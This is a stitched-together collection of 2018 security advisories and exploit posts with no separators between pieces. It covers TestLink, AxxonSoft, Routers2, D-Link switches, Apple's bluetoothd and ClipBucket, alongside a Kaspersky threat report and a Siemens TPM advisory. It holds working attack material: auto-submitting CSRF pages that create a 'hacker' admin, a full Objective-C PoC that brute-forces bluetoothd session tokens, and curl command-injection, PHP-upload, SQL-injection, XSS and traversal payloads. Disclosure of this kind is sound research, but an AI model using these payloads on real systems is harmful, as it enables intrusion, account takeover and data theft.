TestLink Open Source Test Management Insecure Direct Object Reference

SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
=======================================================================
title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
vulnerable version: <1.9.17
fixed version: 1.9.17 (after November 2017), and the current
“testlink_1_9” branch
CVE number: –
impact: Medium
homepage: http://testlink.org/
found: 2017-09-22
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal
Moscow – Munich – Kuala Lumpur – Singapore
Vienna (HQ) – Vilnius – Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
——————-
“TestLink is a web based test management and test execution system.
It enables quality assurance teams to create and manage their test
cases as well as to organize them into test plans. These test plans
allow team members to execute test cases and track test results
dynamically.”

Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code

Business recommendation:
————————
SEC Consult advises to immediately install the available updates as attackers
might gain access to sensitive data belonging to other users.

A thorough security review performed by security professionals is highly
recommended in order to identify potential further security deficiencies.

Vulnerability overview/description:
———————————–
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced by
different test cases. By using a simple ID iterator, all produced output
data can be gathered from the whole system.

The actual impact strongly depends on the classification of the produced data
which is referenced. Therefore, the risk can vary from low to critical
depending on the use case.

Proof of concept:
—————–
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment
by using the following url:
http://<IP-Address>/lib/attachments/attachmentdownload.php?skipCheck=1&id=<ID>

The tag <IP-Address> specifies the target address and can also include a sub-
folder where the hosted TestLink application is located.

Vulnerable / tested versions:
—————————–
The following versions have been tested and are vulnerable. It is assumed that
older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14

Vendor contact timeline:
————————
2017-10-18: Contacting vendor through http://mantis.testlink.org
Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for
1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test
instance) and that it can be verified easily with the PoC
2018-01-09: Asked for status update; No answer.
2018-01-29: Asked for status update; No answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the
advisory.
2018-02-19: Asked the vendor for reachable test-instance, reply: there is
no test instance
2018-02-28: Public release of security advisory

Solution:
———
Check-out the current testlink-code on branch “testlink_1_9”:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/

The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d

Upgrade to 1.9.17 (after November 2017).

Workaround:
———–
Restrict network access and do not expose the TestLink interface to the
internet.

Advisory URL:
————-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal
Moscow – Munich – Kuala Lumpur – Singapore
Vienna (HQ) – Vilnius – Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/about-us/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T.Weber / @2018

AxxonSoft Axxon Next Directory Traversal

Title

AxxonSoft Axxon Next – AxxonSoft Client Directory Traversal via an initial
/css//..%2f substring in a URI. CVE-2018-7467

[Vulnerability Type]

Directory Traversal via an initial /css//..%2f substring in a URI

[Vendor of Product]

AxxonSoft Client

[Affected Product Code Base]

Axxon Next

[Affected Component]

AxxonSoft Client Web Application’s Source Code

[Attack Type]

Remote

[Impact Information Disclosure]

true

[Attack Vectors]

It is a Directory Traversal

/css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2fwindows\System32\drivers\etc\hosts

[Discoverer]

Martin A Cicalla Jr

Routers2 2.24 Cross Site Scripting

# Exploit Title: Routers2 2.24 – Reflected Cross-Site Scripting
# Date: 18-01-18
# Vendor Homepage: http://www.steveshipway.org/software/
# Software Link: https://github.com/sshipway/routers2
# Version: 2.24
# CVE: CVE-2018-6193
# Platform: Perl
# Category: webapps
# Exploit Author: Lorenzo Di Fuccia
# Contact: [email protected]
# Website: https://github.com/lorenzodifuccia

1. Description

Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the ‘rtr’ GET parameter in a page=graph action to `cgi-bin/routers2.pl`.

2. Proof of Concept

http://router.com/cgi-bin/routers2.pl?rtr=–><script>alert(“XSS”)</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers

3. Solution

Update the program cloning the repo from GitHub or disable the ‘paranoia’ setting in the web section of the `routers2.conf`.

4. References

https://github.com/sshipway/routers2/issues/1

D-Link DGS-3000-10TC Cross Site Request Forgery

Hello list!

There are Cross-Site Request Forgery vulnerabilities in D-Link
DGS-3000-10TC. In previous advisory I wrote about Cross-Site Scripting and
Content Spoofing vulnerabilities.

————————-
Affected products:
————————-

Vulnerable is the next model: D-Link DGS-3000-10TC, Firmware Version
2.00.006. All other versions also must be vulnerable.

———-
Details:
———-

Cross-Site Request Forgery (WASC-09):

Admin panel has CSRF vulnerabilities in all functionality. E.g. in this
functionality.

Add new admin:

D-Link DGS-3000-10TC CSRF-1.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad=”document.hack.submit()”>
<form name=”hack” action=”http://site/form/userAccountSettingForm”
method=”post”>
<input type=”hidden” name=”h_flag” value=”0″>
<input type=”hidden” name=”T1″ value=”hacker”>
<input type=”hidden” name=”T5″ value=”password”>
<input type=”hidden” name=”operation” value=”add”>
<input type=”hidden” name=”S2″ value=”Admin”>
<input type=”hidden” name=”T6″ value=”password”>
</form>
</body>
</html>

Change password in new admin:

D-Link DGS-3000-10TC CSRF-2.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad=”document.hack.submit()”>
<form name=”hack” action=”http://site/form/userAccountSettingForm”
method=”post”>
<input type=”hidden” name=”username” value=”hacker”>
<input type=”hidden” name=”acc_right” value=”Admin”>
<input type=”hidden” name=”h_flag” value=”0″>
<input type=”hidden” name=”operation” value=”modify”>
<input type=”hidden” name=”password” value=”password”>
<input type=”hidden” name=”new_password” value=”password1″>
<input type=”hidden” name=”confirm_password” value=”password1″>
</form>
</body>
</html>

Delete new admin:

D-Link DGS-3000-10TC CSRF-3.html

<html>
<head>
<title>D-Link DGS-3000-10TC CSRF exploit (C) 2017 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad=”document.hack.submit()”>
<form name=”hack” action=”http://site/form/userAccountSettingForm”
method=”post”>
<input type=”hidden” name=”T1″ value=”hacker”>
<input type=”hidden” name=”operation” value=”del”>
</form>
</body>
</html>

————
Timeline:
————

2014-2018 – informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.08.28 – informed about it one USA company with bug bounty program –
they were interested in this device, but not in these vulnerabilities. Later
informed D-Link about them.
2017.10.28 – disclosed at my site (http://websecurity.com.ua/8720/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Financial Cyberthreats in 2017

In 2017, we saw a number of changes to the world of financial threats and new actors emerging. As we have previously noted, fraud attacks in financial services have become increasingly account-centric. User data is a key enabler for large-scale fraud attacks, and frequent data breaches – among other successful attack types – have provided cybercriminals with valuable sources of personal information to use in account takeovers or false identity attacks. These account-centric attacks can result in many other losses, including those of further customer data and trust, so mitigation is as important as ever for both businesses and financial services customers.

Attacks on ATMs continued to rise in 2017, attracting the attention of many cybercriminals, with attackers targeting bank infrastructure and payment systems using sophisticated fileless malware, as well as the more rudimentary methods of taping over CCTVs and drilling holes. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malwareremote operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars, along with a step-by-step user guide. Kaspersky Lab has published a report outlining possible future ATM attack scenarios targeting ATM authentication systems.

It is also worth mentioning that major cyber incidents continue to take place. In September 2017, Kaspersky Lab researchers identified a new series of targeted attacks against at least 10 financial organizations in multiple regions, including Russia, Armenia, and Malaysia. The hits were performed by a new group called Silence. While stealing funds from its victims, Silence implemented specific techniques similar to the infamous threat actor, Carbanak.

Thus, Silence joins the ranks of the most devastating and complex cyber-robbery operations like Metel, GCMAN and Carbanak/Cobalt, which have succeeded in stealing millions of dollars from financial organizations. The interesting point to note with this actor is that the criminals exploit the infrastructure of already infected financial institutions for new attacks: sending emails from real employee addresses to a new victim, along with a request to open a bank account. Using this trick, criminals make sure the recipient doesn’t suspect the infection vector.

Small and medium-sized businesses didn’t escape financial threats either. Last year Kaspersky Lab’s researchers discovered a new botnet that cashes-in on aggressive advertising, mostly in Germany and the US. Criminals infect their victims’ computers with the Magala Trojan Clicker, generating fake ad views, and making up to $350 from each machine. Small enterprises lose out most because they end up doing business with unscrupulous advertisers, without even knowing it.

Moving down one more step – from SMEs to individual users – we can say that 2017 didn’t give the latter much respite from financial threats. Kaspersky Lab researchers detected NukeBot – a new malware designed to steal the credentials of online banking customers. Earlier versions of the Trojan were known to the security industry as TinyNuke, but they lacked the features necessary to launch attacks. The latest versions however, are fully operable, and contain code to target the users of specific banks.

This report summarizes a series of Kaspersky Lab reports that between them provide an overview of how the financial threat landscape has evolved over the years. It covers the common phishing threats that users encounter, along with Windows-based and Android-based financial malware.

The key findings of the report are:

Phishing:

  • In 2017, the share of financial phishing increased from 47.5% to almost 54% of all phishing detections. This is an all-time high, according to Kaspersky Lab statistics for financial phishing.
  • More than one in four attempts to load a phishing page blocked by Kaspersky Lab products is related to banking phishing.
  • The share of phishing related to payment systems and online shops accounted for almost 16% and 11% respectively in 2017. This is slightly more (single percentage points) than in 2016.
  • The share of financial phishing encountered by Mac users nearly doubled, accounting for almost 56%.

Banking malware:

  • In 2017, the number of users attacked with banking Trojans was 767,072, a decrease of 30% on 2016 (1,088,900).
  • 19% of users attacked with banking malware were corporate users.
  • Users in Germany, Russia, China, India, Vietnam, Brazil and the US were the most often attacked by banking malware.
  • Zbot is still the most widespread banking malware family (almost 33% of attacked users), but is now being challenged by the Gozi family (27.8%).

Android banking malware:

  • In 2017, the number of users that encountered Android banking malware decreased by almost 15% to 259,828 worldwide.
  • Just three banking malware families accounted for attacks on the vast majority of users (over 70%).
  • Russia, Australia and Turkmenistan were the countries with the highest percentage of users attacked by Android banking malware.

 Read the full “Financial Cyberthreats in 2017” report (English, PDF)

Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 bluetoothd Memory Corruption

//
// main.m
// bluetoothdPoC
//
// Created by Rani Idan.
// Copyright A(c) 2018 zLabs. All rights reserved.
//

#import “AppDelegate.h”

#include <mach/mach.h>

extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);

/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
#define CALLBACK_ADDRESS 0xdeadbeef
#define CALLBACK_ADDITIONAL_DATA 0x13371337

#define BLUETOOTHD_CONST 0xFA300
#define BLUETOOTHD_WRONG_TOKEN 7

#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
#define BLUETOOTHD_MIG_SERVER_NAME “com.apple.server.bluetooth”

#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40

typedef unsigned int mach_msg_return_value;

mach_port_t get_service_port(char *service_name)
{

kern_return_t ret = KERN_SUCCESS;
mach_port_t service_port = MACH_PORT_NULL;
mach_port_t bs = MACH_PORT_NULL;

ret = task_get_bootstrap_port(mach_task_self(), &bs);

ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
if (ret)
{
NSLog(@”Couldn’t find port for %s”,service_name);
return MACH_PORT_NULL;
}

NSLog(@”Got port: %x”, service_port);

mach_port_deallocate(mach_task_self(), bs);
return service_port;
}

mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
{
mach_port_t receive_port = MACH_PORT_NULL;
mach_msg_header_t * message = NULL;
char *data = NULL;
kern_return_t ret = KERN_SUCCESS;

mach_msg_return_value return_value = 0;

mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
mach_msg_size_t msg_size = MAX(recv_size, send_size);

ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@”Failed to allocate port ret=%x”, ret);
NSLog(@”mach_error_string: mach_error_string %s”, mach_error_string(ret));
goto cleanup;
}
ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@”Failed to insert port right ret=%x”, ret);
NSLog(@”mach_error_string: mach_error_string %s”, mach_error_string(ret));
goto cleanup;
}
message = malloc(msg_size);
data = (char *)message;

memset(message, 0, msg_size);

*((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
*((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
*((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;

message->msgh_bits = 0x1513 ;

message->msgh_remote_port = bluetoothd_port; /* Request port */
message->msgh_local_port = receive_port; /* Reply port */
message->msgh_size = send_size; /* Message size */
message->msgh_reserved = 0;

message->msgh_id = BLUETOOTHD_CONST + msgh_id;

ret = mach_msg(message, /* The header */
options, /* Flags */
send_size, /* Send size */
recv_size, /* Max receive Size */
receive_port, /* Receive port */
BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT, /* No timeout */
MACH_PORT_NULL); /* No notification */

if(MACH_MSG_SUCCESS == ret)
{
return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
if (return_value != BLUETOOTHD_WRONG_TOKEN) {
NSLog(@”Sent message id %d with token %x, returned: %x”, msgh_id, session_token, return_value);
}
} else if (MACH_RCV_INVALID_NAME == ret)
{
NSLog(@”mach_error_string: mach_error_string %s”, mach_error_string(ret));
NSLog(@”mach_error_int: ret=%x”, ret);
NSLog(@”mach_remote_port: %x”, message->msgh_remote_port);
return_value = -2;
}
else {
NSLog(@”mach_error_string: mach_error_string %s”, mach_error_string(ret));
NSLog(@”mach_error_int: ret=%x”, ret);
NSLog(@”mach_remote_port: %x”, message->msgh_remote_port);
return_value = -1;
}

cleanup:
if(MACH_PORT_NULL != receive_port)
{
mach_port_destroy(mach_task_self(), receive_port);
}
if (NULL != message) {
free(message);
}
return return_value;
}

void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
{
int ports_found[0xffff] = {0};
int number_of_ports_found = 0;

mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
if (MACH_PORT_NULL == bluetoothd_port)
{
NSLog(@”Couldn’t have bluetoothd port”);
return;
}

NSLog(@”Starting to look for session tokens”);
for (int i = 0; i <= 0xffff; i++) {
int id = 0;
id = (i << 16) + 1;
int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@”Found port: %x”, id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}

id = (i << 16) + 2;
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@”Found port: %x”, id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}

id = (i << 16);
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@”Found port: %x”, id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}

}

for (int i = number_of_ports_found-1; i>=0; i–) {
NSLog(@”Adding callback: Port=%x address=%x value=%x”, ports_found[i], (unsigned int)address, (unsigned int)value);
BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
}

NSLog(@”Done”);
return;
}

void trigger() {
try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
}

int main(int argc, char * argv[]) {
trigger();
}

ClipBucket SQL Injection / Command Injection / File Upload

SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
=======================================================================
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 – Release 4902
fixed version: 4.0.0 – Release 4902
CVE number: –
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal
Moscow – Munich – Kuala Lumpur – Singapore
Vienna (HQ) – Vilnius – Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
——————-
“ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players.”

Source: https://clipbucket.com/about

Business recommendation:
————————
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.

Vulnerability overview/description:
———————————–
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.

Proof of concept:
—————–
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the “file_name” parameter during the file upload in the script
/api/file_uploader.php:

$ curl -F “[email protected]” -F “file_name=aa.php ||<<COMMAND HERE>>”
http://$HOST/api/file_uploader.php

Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl –cookie “[–SNIP–]” –data “file=http://localhost/vid.mp4&file_name=abc
|| <<COMMAND HERE>>” “http://$HOST/actions/file_downloader.php”

2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F “[email protected]” -F “plupload=1” -F “name=anyname.php”
“http://$HOST/actions/beats_uploader.php”

$ curl -F “[email protected]” -F “plupload=1” -F “name=anyname.php”
“http://$HOST/actions/photo_uploader.php”

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl –cookie “[–SNIP–]” -F
[email protected]
“http://$HOST/edit_account.php?mode=avatar_bg”

3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL : http://$HOST/actions/vote_channel.php
METHOD : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[…]
$vote = $_POST[“vote”];
$userid = $_POST[“channelId”];
//if($userquery->login_check(”,true)){
if($vote == “yes”){
$query = “UPDATE ” . tbl(“users”) . ” SET voted = voted + 1, likes = likes + 1
WHERE userid = {$userid}”;
}else{
//$query = “UPDATE ” . tbl(“users”) . ” SET likes = likes (- 1) WHERE userid =
{$userid}”;
$sel = “Select userid,username,likes From “.tbl(“users”).” WHERE userid =
{$userid}”;
$result = $db->Execute($sel);
foreach ($result as $row )
$current_likes = $row[‘likes’];
$decremented_like = $current_likes-1;
$query = “Update “.tbl(“users”).” Set likes = $decremented_like Where userid
= $userid”;
}
[…]

URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=emailExists&email=1′ or ‘1’=’1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[…]
$email = $_POST[’email’];
$check = $db->select(tbl(‘users’),”email”,” email=’$email'”);
if (!$check) {
echo “NO”;
}
[…]

URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=userExists&username=1′ or ‘1’=’1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[…]
$username = $_POST[‘username’];
$check = $db->select(tbl(‘users’),”username”,” username=’$username'”);
if (!$check) {
echo “NO”;
}
[…]

Vulnerable / tested versions:
—————————–
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
the latest at the time the security vulnerabilities were discovered.

Vendor contact timeline:
————————
2017-10-17: Contacting vendor through email.
2017-10-18: Vendor asking for additional details.
2017-10-19: Replied to vendor.
2017-10-26: Request update from vendor, no response.
2017-11-09: Request update from vendor.
2017-11-09: Vendor response with security patches.
2017-11-10: Notified vendor the security patches don’t fix the reported issues
2017-11-30: Request update from vendor.
2017-11-30: Vendor requesting for support via Skype
2017-12-07: Response to vendor.
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
2018-01-22: Vendor provides latest patches, scheduled for future release
2018-01-26: Verified that the patches don’t fully mitigate all issues.
2018-01-29: Request update from vendor, no response.
2018-02-06: Request update from vendor, no response.
2018-02-08: Informing vendor of public release date
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
two weeks; postponing once again for two weeks
2018-02-23: Request update from vendor.
2018-02-26: Vendor publishes v4.0
2018-02-27: Public release of security advisory

Solution:
———
The vendor provided the following patched version:
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip

Workaround:
———–
None

Advisory URL:
————-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal
Moscow – Munich – Kuala Lumpur – Singapore
Vienna (HQ) – Vilnius – Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Ahmad Ramadhan / @2018

Siemens SIMATIC Industrial PCs

CVSS v3 5.9

ATTENTION: Remotely exploitable

Vendor: Siemens

Equipment: SIMATIC Industrial PCs

Vulnerability: Cryptographic Issues

AFFECTED PRODUCTS

Siemens reports that the vulnerability affects the following versions of SIMATIC Industrial PCs using a version of Infineon’s Trusted Platform Module (TPM):

  • SIMATIC Field-PG M5 all versions prior to v22.01.04,
  • SIMATIC IPC227E all versions prior to v20.01.10,
  • SIMATIC IPC277E all versions prior to v20.01.10,
  • SIMATIC IPC427E all versions prior to v21.01.07,
  • SIMATIC IPC477E all versions prior to v21.01.07,
  • SIMATIC IPC547G all versions, and
  • SIMATIC ITP1000 all versions prior to v23.01.03

IMPACT

Successful exploitation of this vulnerability could make it easier for attackers to conduct cryptographic attacks against the key material.

MITIGATION

As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to run the devices in a protected IT environment, Siemens particularly recommends to configure the environment according to Siemens’ Operational Guidelines for Industrial Security and to follow the recommendations in the product manuals. The Operational Guidelines for Industrial Security can be found at:

https://www.siemens.com/cert/operational-guidelines-industrial-security

Additional information on Industrial Security by Siemens can be found at: 

https://www.siemens.com/global/en/home/company/topic-areas/future-of-manufacturing/industrial-security.html

Siemens provides firmware updates to address the vulnerability for the following affected products, and recommends users update to the newest version:

  • SIMATIC Field-PG M5: Update to v22.01.04

https://support.industry.siemens.com/cs/ww/de/view/109738122

  • SIMATIC IPC227E: Update to v20.01.10

https://support.industry.siemens.com/cs/ww/de/view/109481715

  • SIMATIC IPC277E: Update to v20.01.10

https://support.industry.siemens.com/cs/ww/de/view/109481715

  • SIMATIC IPC427E: Update to v21.01.07

https://support.industry.siemens.com/cs/ww/de/view/109742593

  • SIMATIC IPC477E: Update to v21.01.07

https://support.industry.siemens.com/cs/ww/de/view/109742593

  • SIMATIC IPC547G: See recommendations from Workarounds and Mitigations section in SSA-470231

http://www.siemens.com/cert/en/cert-security-advisories.htm

  • SIMATIC ITP1000: Update to v23.01.03

https://support.industry.siemens.com/cs/ww/de/view/109748173

For more information on this vulnerability and more detailed mitigation instructions, please see Siemens Security Advisory SSA-470231 at the following location:

http://www.siemens.com/cert/en/cert-security-advisories.htm

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the NCCIC Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability. High skill level is needed to exploit.

VULNERABILITY OVERVIEW

The Infineon RSA library in Infineon Trusted Platform Module (TPM) firmware creates RSA keys that might be susceptible to the ROCA attack, possibly exposing the private key of a RSA key pair.

CVE-2017-15361 has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).

RESEARCHER

Siemens reported this vulnerability to NCCIC.

BACKGROUND

Critical Infrastructure Sectors: Chemical, Critical Manufacturing, Energy, Food and Agriculture, Water and Wastewater Systems

Countries/Areas Deployed: Worldwide

